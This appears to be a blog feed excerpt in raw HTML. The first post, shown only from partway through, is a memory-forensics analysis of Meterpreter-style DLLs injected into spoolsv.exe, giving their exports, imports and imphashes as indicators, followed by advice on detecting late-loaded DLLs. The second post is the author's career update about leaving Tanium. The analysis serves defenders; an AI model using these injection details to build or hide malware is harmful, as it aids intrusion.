10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:37+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x21c86</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">export name: </font><font color="#04ff00">ext_server_priv.x64.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) DeinitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1) GetExtensionName</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2) InitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>3) ReflectiveLoader</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>4) control</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- PSAPI.DLL.GetModuleBaseNameA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- PSAPI.DLL.EnumProcesses</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WaitForSingleObject...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.DuplicateToken...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: ffef24858578d3574c5d32e8809de379</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above we have a few more bits of information and much redacted for the sake of space, the name of another injected dll -- </font><font face="courier">ext_server_priv.x64.dll</font><font face="inherit"> -- and a new imported dll that belongs to the list of late loaded dlls in spoolsv.exe, </font><font face="courier">PSAPI.DLL</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Let's dump the last one:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093c70000.dmp 0</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">timestamp: 2017-03-17T17:57:53+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x6fb3b</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">export name: </font><font color="#04ff00">ext_server_stdapi.x64.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) DeinitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1) GetExtensionName</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>2) InitServerExtension</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>3) ReflectiveLoader</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- PSAPI.DLL.GetDeviceDriverBaseNameW...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- WINMM.dll.waveInAddBuffer...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- IPHLPAPI.DLL.GetIpNetTable...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- SHLWAPI.dll.SHDeleteKeyW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- WS2_32.dll.accept...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleFileNameA...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"> </span><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- USER32.dll.SwitchDesktop...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.ImpersonateLoggedOnUser...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ole32.dll.CoCreateInstance...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- OLEAUT32.dll.VariantClear...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="Apple-converted-space" style="font-variant-ligatures: no-common-ligatures;"> </span><span style="font-variant-ligatures: no-common-ligatures;">- MPR.dll.WNetGetUniversalNameA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- NETAPI32.dll.NetWkstaGetInfo</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">sections:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .text...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: 204d5fb9d32a5334c03d70887f17e301</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Another new dll, </font><font face="courier">ext_server_stdapi.x64.dll</font><font face="inherit"> along with its exports and a redacted list of imports. These imports nearly round out the list of late loaded dlls found in </font><font face="courier">spoolsv.exe</font><font face="inherit">., I believe only </font><font face="courier">wkscli.dll</font><font face="inherit"> is missing.</font></span></div><h2 style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">What are the takeaways?</font></span></h2><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Attackers are crafty and have been for a long time. This post presents the visible part of the ice berg. There are <a href="https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" target="_blank">other ways to inject</a> malicious code into legitimate processes. Some of these may not lend themselves to easy discovery, some may. It's incumbent upon as as defenders, hunters, investigators and insatiably curious types to test and testify to our test results.</font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Fortunately, though attackers be sneaky and creative, diligent defenders can build detections around late loading dlls or <a href="https://github.com/davehull/Kansa/blob/master/Modules/Process/Get-ProcessesUsingModules.ps1" target="_blank">hunt for specific sets of dlls associated</a> with malicious agent migrations.</font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">In future posts, I'd like to explore Truncer's framework and see if Volatility can pull back its veil. That was bad. I'm sorry. I'd also like to dive in deeper on the byte array and explain what's happening there.</font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">I want to encourage you to take a look at </font><font face="courier">memtriage</font><font face="inherit">. I don't hear much chatter about it, but I think it's a game changer enabling more rapid response.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><h3 style="text-align: left; text-indent: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font><a href="https://trustedsignal.blogspot.com/2020/07/analyzing-instance-of-meterpreters.html" target="_blank"><font face="inherit"><span style="font-weight: 400;">Next Up: </span></font><span style="font-weight: 400;">Amateur</span><font face="inherit"><span style="font-weight: 400;"> hour analysis of the shellcode shown above</span></font></a></font></span></h3><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-26194592280301847082020-06-11T21:33:00.002-07:002020-06-12T07:50:47.726-07:00The last 1717 days<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">I mentioned on LinkedIn yesterday that I'm looking for a new role. For recruiters and interested parties, I thought I should provide some background about what I've been doing for the last four and a half years.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">I left Microsoft back in September of 2015. It was a difficult decision. I worked with and "against" brilliant people on really interesting problems. It was one of the most challenging and rewarding jobs I've ever had.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">I left to join Tanium, a company that I'd never heard of at the time. A friend of mine who I'd known through Microsoft reached out to me about it. His claims about what Tanium could do were hard to believe. He said it could pull a list of running processes with their hashes, data about network connections, information about files on disk, installed software, logged in users, etc. from hundreds of thousands of systems across multiple platforms in seconds. </span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">According to my friend, Tanium could execute changes on those systems just as fast and it could do all of this with very little infrastructure. We would find out later through the work of a brilliant engineer that the architecture could scale to more than one million endpoints managed by a single server -- a beefy server, to be sure, but not 100 servers or 50. One.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">The scalability of the platform meant that security and operations teams could be more agile. They wouldn't need a team of engineers focused on maintaining a fleet of servers, instead those engineers could focus on hunting, investigating, responding to incidents, patching, running vulnerability scans, etc.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Having worked with other commercial products and having built my own tooling to perform incident response tasks, I was skeptical. How had a company I'd never heard of conquered this hill that so many products had died on?</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">We talked off and on for a few weeks. I spoke with a seemingly endless list of different people from Tanium and we agreed there was alignment of my interests and their objectives. I joined the company.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">During my time at Tanium I contributed code to extend the security incident response capabilities of the platform. Alongside others, I developed and delivered training. I became a "player / coach" on a team with deep experience in DFIR work. We had former Feds, Mandiant, Cylance and professionals from industry in our ranks. We helped our customers understand what the platform could and could not do. We won their confidence and trust.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">We helped customers respond to security incidents. When information on 0days came to light, we worked with engineers across the entire company to determine if we had existing capabilities to address those issues and if not, we rapidly put together new content to help investigate and mitigate. In the days of WannaCry, it was incredibly satisfying to work with customers to mitigate the SMBv1 vulnerability across hundreds of thousands of endpoints in their networks in seconds -- not minutes, days or weeks.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tanium is not a perfect product. No perfect product exists, but over the last four and a half years product managers, developers and engineers have worked tirelessly to make it better and better. If I were a CIO or a CISO in a large enterprise, Tanium would be on my short list of must have tools. I say all of this as someone who is effectively an ex-Tanium employee. I still have a few days left and in full-disclosure, I own stock in the company, but even if I could sell all of my stock today and my position was terminated effective immediately, Tanium would be on my list. There may be better niche products for some specific problems (for now), but there is nothing on the market that is as flexible and as scalable as Tanium and in the enterprise, flexibility and scalability are a winning combination for tackling all kinds of unforeseen problems.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Why leave? And especially why leave during a global pandemic, the worst unemployment since the Great Depression, a time of massive civil unrest, with a mortgage and multiple college tuitions to cover? I left because it was time. It was time for me to move on to new challenges and new personal growth and in so doing, I hope I have provided opportunities for growth for those I left behind.</span></font></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; line-height: 1.5; padding: 0px; vertical-align: baseline; white-space: pre-wrap;"><font face="arial" style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;">Godspeed former colleagues.</span></font></div>
